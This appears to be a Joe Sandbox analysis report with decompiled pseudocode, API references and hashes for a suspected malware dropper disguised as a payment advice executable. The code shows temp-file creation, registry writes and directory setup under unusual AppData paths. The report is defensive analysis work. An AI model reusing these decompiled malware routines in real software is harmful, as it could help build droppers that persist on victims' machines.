Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje
API String ID: 2987980305-1367780579
Opcode ID: 666734c66828422f9813c0a1be1985276cd40b8de0409234f3b2e4a59062ea94
Instruction ID: fd60b9c6cfc4bddbe94fc7e5a8503348695d94644a3847b69ed94d97695b539d
Opcode Fuzzy Hash: 666734c66828422f9813c0a1be1985276cd40b8de0409234f3b2e4a59062ea94
Instruction Fuzzy Hash: BC21C971A00215BBCF207FA48E49BAE75B0AB54359F20413BF601B22D0C6BD4A42D66E

Uniqueness

Uniqueness Score: -1.00%

Function 00405B32 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405B32(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x4093b4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405b36
0x00405b3c
0x00405b3d
0x00405b3d
0x00405b42
0x00405b43
0x00405b46
0x00405b50
0x00405b5d
0x00405b60
0x00405b68
0x00000000
0x00000000
0x00405b6c
0x00000000
0x00000000
0x00405b6e
0x00000000
0x00405b6e
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405B46
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B60

Strings

"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe", xrefs: 00405B32
nsa, xrefs: 00405B3D
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B35

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3943319255
Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction ID: 47ad9e4c3b070603f63866c15a94f77f10573a77d4085d28ed577f0a2abf86d9
Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction Fuzzy Hash: FFF089367082086BD7104F55DC04B9B7BA8DF91750F10803BFA049A191D6B4B9548B59

Uniqueness

Uniqueness Score: -1.00%

Function 6E1616DF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E6E1616DF(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x6e16405c = _a8;
				 *0x6e164060 = _a16;
				 *0x6e164064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6e164038, E6E161556);
				_push(1); // executed
				_t37 = E6E161A9C(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E6E162273(_t54);
					}
					E6E1622B5(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E6E16249C(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E6E16156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E6E16249C(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E6E16249C(_t54);
							_t37 = GlobalFree(E6E161266(E6E161559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E6E162462(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E6E1614E2( *0x6e164058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E6E162C7B(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E6E1629C0(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E6E162676(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6e1616df
0x6e1616df
0x6e1616df
0x6e1616e9
0x6e1616f1
0x6e1616fe
0x6e16170c
0x6e16170f
0x6e161711
0x6e161716
0x6e16171b
0x6e16183a
0x6e16183a
0x6e161721
0x6e161725
0x6e161728
0x6e16172d
0x6e16172f
0x6e161735
0x6e16173b
0x6e16176b
0x6e161772
0x6e161796
0x6e1617e1
0x6e161798
0x6e161798
0x6e161799
0x6e16179f
0x6e1617a0
0x6e1617aa
0x6e1617ad
0x6e1617b2
0x6e1617b9
0x6e1617b9
0x6e1617c0
0x6e1617c6
0x6e1617cc
0x6e1617d9
0x6e1617da
0x6e1617dd
0x6e161774
0x6e161775
0x6e16178a
0x6e16178a
0x6e1617eb
0x6e1617ee
0x6e1617fb
0x6e161802
0x6e16180a
0x6e16180d
0x6e16180d
0x6e16180a
0x6e16181a
0x6e161822
0x6e161827
0x6e16181a
0x6e16182f
0x00000000
0x6e161831
0x00000000
0x6e161832
0x6e16182f
0x6e16173f
0x6e161742
0x6e161760
0x00000000
0x00000000
0x6e161763
0x6e161768
0x6e161768
0x6e16176a
0x00000000
0x6e16176a
0x6e161744
0x6e161745
0x6e16174d
0x6e16174e
0x00000000
0x6e16174e
0x6e161747
0x6e161748
0x6e161756
0x00000000
0x6e161756
0x6e16174b
0x00000000
0x00000000
0x00000000
0x6e16174b

APIs

Part of subcall function 6E161A9C: GlobalFree.KERNEL32 ref: 6E161CEB
Part of subcall function 6E161A9C: GlobalFree.KERNEL32 ref: 6E161CF0
Part of subcall function 6E161A9C: GlobalFree.KERNEL32 ref: 6E161CF5

GlobalFree.KERNEL32 ref: 6E16178A
FreeLibrary.KERNEL32(?), ref: 6E16180D
GlobalFree.KERNEL32 ref: 6E161832

Part of subcall function 6E162273: GlobalAlloc.KERNEL32(00000040,?), ref: 6E1622A4

Part of subcall function 6E162676: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E16175B,00000000), ref: 6E162746

Part of subcall function 6E16156B: lstrcpyA.KERNEL32(?,6E164010,00000000,6E161568,?,00000000,6E1616B7,00000000), ref: 6E161581

Strings

, xrefs: 6E161813

Memory Dump Source

Source File: 00000000.00000002.839140691.000000006E161000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.839133432.000000006E160000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839147920.000000006E163000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839153984.000000006E165000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e160000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: da27caf8ab1cf4ed6bcbde82b0fc72f6187a50d50d6ffcbe1b1ab258f7911ff2
Instruction ID: 0d7662fe626b0f668b5f764f526bfdb587557e7fa6136125570a061fc0b89109
Opcode Fuzzy Hash: da27caf8ab1cf4ed6bcbde82b0fc72f6187a50d50d6ffcbe1b1ab258f7911ff2
Instruction Fuzzy Hash: 8841AD716002169ACF40DFF4C894BEA37ECBB16318F14C864E91D9E086DB7494EDEBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00401C0A(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402AA9(3);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402AA9(4);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402ACB(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402ACB(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402ACB();
					_t32 = E00402ACB();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t61 = E00402AA9();
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t41 = E00402AA9(2);
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00405EC8();
				}
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c0a
0x00401c0c
0x00401c13
0x00401c16
0x00401c19
0x00401c23
0x00401c27
0x00401c2a
0x00401c33
0x00401c33
0x00401c36
0x00401c3a
0x00401c43
0x00401c43
0x00401c46
0x00401c4a
0x00401c4c
0x00401ca1
0x00401ca3
0x00401cac
0x00401cb4
0x00401cb7
0x00401cb7
0x00401cc0
0x00000000
0x00401c4e
0x00401c55
0x00401c57
0x00401c5a
0x00401c60
0x00401c67
0x00401c6a
0x00401c92
0x00401cc6
0x00401cc6
0x00401c6c
0x00401c7a
0x00401c82
0x00401c85
0x00401c85
0x00401c6a
0x00401cc9
0x00401ccc
0x00401cd2
0x004028ff
0x004028ff
0x0040295a
0x00402966

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 5c5cc43d9ea2f1c4f8babb9c5b306aab98c19b0d16ecc4efa158615eb64d646c
Instruction ID: 3953527ca16890ec8ab59ce35194567eea46ff7bd29c8182c04533b3460f2dbd
Opcode Fuzzy Hash: 5c5cc43d9ea2f1c4f8babb9c5b306aab98c19b0d16ecc4efa158615eb64d646c
Instruction Fuzzy Hash: 0C21A2B1E44209BEEF15DFA5D986AAD7BB4EF84304F24843EF501B61D0CB7886418F28

Uniqueness

Uniqueness Score: -1.00%

Function 004023D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004023D6(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t18;
				void* _t19;
				int _t22;
				long _t23;
				int _t28;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t35;
				void* _t37;
				void* _t40;

				_t31 = __edx;
				_t28 = __ebx;
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				_t32 = __eax;
				 *(_t37 - 0x3c) =  *(_t37 - 0x14);
				 *(_t37 - 0x34) = E00402ACB(2);
				_t18 = E00402ACB(0x11);
				 *(_t37 - 4) = 1;
				_t19 = E00402B5B(_t40, _t32, _t18, 2); // executed
				 *(_t37 + 8) = _t19;
				if(_t19 != __ebx) {
					_t22 = 0;
					if(_t35 == 1) {
						E00402ACB(0x23);
						_t22 = lstrlenA(0x409be8) + 1;
					}
					if(_t35 == 4) {
						 *0x409be8 = E00402AA9(3);
						 *((intOrPtr*)(_t37 - 0x80)) = _t31;
						_t22 = _t35;
					}
					if(_t35 == 3) {
						_t22 = E00402F9C( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x409be8, 0xc00); // executed
					}
					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t28,  *(_t37 - 0x3c), 0x409be8, _t22); // executed
					if(_t23 == 0) {
						 *(_t37 - 4) = _t28;
					}
					_push( *(_t37 + 8));
					RegCloseKey(); // executed
				}
				 *0x4237a8 =  *0x4237a8 +  *(_t37 - 4);
				return 0;
			}

0x004023d6
0x004023d6
0x004023d6
0x004023d9
0x004023e0
0x004023ea
0x004023ed
0x004023f6
0x004023fd
0x00402404
0x00402407
0x0040240d
0x00402417
0x0040241b
0x00402426
0x00402426
0x0040242a
0x00402434
0x0040243a
0x0040243d
0x0040243d
0x00402441
0x0040244d
0x0040244d
0x0040245e
0x00402466
0x00402468
0x00402468
0x0040246b
0x00402542
0x00402542
0x0040295a
0x00402966

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nslD140.tmp,00000023,00000011,00000002), ref: 00402421
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nslD140.tmp,00000000,00000011,00000002), ref: 0040245E
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nslD140.tmp,00000000,00000011,00000002), ref: 00402542

Strings

C:\Users\user\AppData\Local\Temp\nslD140.tmp, xrefs: 00402412, 00402434, 00402448, 00402453

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nslD140.tmp
API String ID: 2655323295-706521243
Opcode ID: 460c77aba0858f9a7e35d51d432eeace50d5ab930c64f140853937cc13cb02e4
Instruction ID: 1fc307ab1697ef986dd5cd2868f3fef353c7a70d956ff55dcab5481d81c0b37e
Opcode Fuzzy Hash: 460c77aba0858f9a7e35d51d432eeace50d5ab930c64f140853937cc13cb02e4
Instruction Fuzzy Hash: E2119371E00115BEDF10EFA5DE49AAEBA74EB54318F20843BF504F71D1C6B95D419B28

Uniqueness

Uniqueness Score: -1.00%

Function 6E1629C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E6E1629C0(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				long _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x6e164040 != 0 && E6E162941(_a4) == 0) {
					 *0x6e164044 = _t106;
					if( *0x6e16403c != 0) {
						_t106 =  *0x6e16403c;
					} else {
						E6E162F20(E6E16293B(), __ecx);
						 *0x6e16403c = _t106;
					}
				}
				_t31 = E6E16297D(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E6E162971();
					_t81 = _a4;
					_t90 =  *0x6e164048;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x6e164048 = _t81;
					E6E16296B();
					_t36 = SetFilePointer(??, ??, ??, ??); // executed
					 *0x6e16401c = _t36;
					 *0x6e164020 = _t90;
					if( *0x6e164040 != 0 && E6E162941( *0x6e164048) == 0) {
						 *0x6e16403c = _t107;
						_t107 =  *0x6e164044;
					}
					_t91 =  *0x6e164048;
					_a4 = _t91;
					 *0x6e164048 =  *((intOrPtr*)(E6E162971() + _t91));
					_t40 = E6E16294F(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E6E16297D(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E6E162988() + _a4 + _v8);
							_push(E6E162992());
							if( *0x6e164040 <= 0 || E6E162941(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x6e16403c =  *0x6e16403c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x6e164048 == 0) {
						 *0x6e16403c = 0;
					}
					_t94 = _a4 + E6E162988();
					 *(E6E162996() + _t94) =  *0x6e16401c;
					 *((intOrPtr*)(E6E16299A() + _t94)) =  *0x6e164020;
					E6E1629AA(_a4);
					if(E6E16295D() != 0) {
						 *0x6e164058 = GetLastError();
					}
					return _a4;
				}
				_push(E6E162988() + _a4);
				_t65 = E6E16298E();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E6E16299A();
				_t100 = E6E162996();
				_t103 = E6E162992();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6e1629d0
0x6e1629e1
0x6e1629ee
0x6e162a02
0x6e1629f0
0x6e1629f5
0x6e1629fa
0x6e1629fa
0x6e1629ee
0x6e162a0b
0x6e162a10
0x6e162a16
0x6e162a5a
0x6e162a5a
0x6e162a5f
0x6e162a64
0x6e162a6a
0x6e162a6c
0x6e162a72
0x6e162a7f
0x6e162a81
0x6e162a86
0x6e162a93
0x6e162aa6
0x6e162aac
0x6e162ab2
0x6e162ab3
0x6e162ab9
0x6e162ac5
0x6e162acb
0x6e162ad3
0x6e162ad4
0x6e162ad7
0x6e162ae2
0x6e162ae4
0x6e162af0
0x6e162af6
0x6e162afe
0x6e162b2a
0x6e162b2b
0x6e162b31
0x6e162b31
0x6e162b38
0x6e162b0e
0x6e162b0e
0x6e162b0f
0x6e162b1d
0x6e162b26
0x6e162b26
0x6e162afe
0x6e162ae2
0x6e162b41
0x6e162b43
0x6e162b43
0x6e162b55
0x6e162b62
0x6e162b70
0x6e162b76
0x6e162b84
0x6e162b8c
0x6e162b8c
0x6e162b9a
0x6e162b9a
0x6e162a21
0x6e162a22
0x6e162a27
0x6e162a2b
0x6e162a30
0x6e162a44
0x6e162a45
0x6e162a46
0x6e162a48
0x6e162a4d
0x6e162a4f
0x6e162a4f
0x6e162a52
0x6e162a58
0x00000000

APIs

SetFilePointer.KERNELBASE(00000000), ref: 6E162A7F
GetLastError.KERNEL32 ref: 6E162B86

Strings

@Mhv, xrefs: 6E162B86

Memory Dump Source

Source File: 00000000.00000002.839140691.000000006E161000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.839133432.000000006E160000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839147920.000000006E163000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839153984.000000006E165000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e160000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: @Mhv
API String ID: 2976181284-3595611156
Opcode ID: df3c39ca4959fe6cbbb95b01e2e6e4376ef75870825fb9ec7dd6128374e1190d
Instruction ID: 2a2870d416835cc27c83406e607eabf7425f54f31a7dab6bcabf7977660640b8
Opcode Fuzzy Hash: df3c39ca4959fe6cbbb95b01e2e6e4376ef75870825fb9ec7dd6128374e1190d
Instruction Fuzzy Hash: DE513A72905625DFDF60DFE4D850BED37A8FB96359F208C29D80587200D73898E2EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402ACB(0xfffffff0);
				_t13 = E0040599B(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E0040592D(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004055D4(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004055F1(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405557(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405F6A("C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Rekapitulerer\\Inseminerede79", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x0040223d
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x0040295a
0x00402966

APIs

Part of subcall function 0040599B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslD140.tmp,?,00405A07,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,766DFA90,?,C:\Users\user\AppData\Local\Temp\,00405752,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A9
Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059AE
Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059C2

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 00405557: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040559A

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

